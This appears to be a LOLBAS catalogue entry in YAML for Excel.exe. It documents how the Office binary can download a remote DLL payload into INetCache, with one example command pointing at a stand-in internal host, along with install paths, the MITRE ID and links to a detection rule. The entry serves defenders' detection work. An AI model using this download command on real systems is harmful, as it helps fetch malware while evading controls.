LOLBAS/yml/OtherMSBinaries/Excel.yml

43 lines
2.0 KiB
YAML
Raw Normal View History

---
Name: Excel.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office16\Excel.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office15\Excel.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office14\Excel.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml
- IOC: Suspicious Office application Internet/network traffic
Resources:
- Link: https://twitter.com/reegun21/status/1150032506504151040
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Acknowledgement:
- Person: 'Reegun J (OCBC Bank)'
Handle: '@reegun21'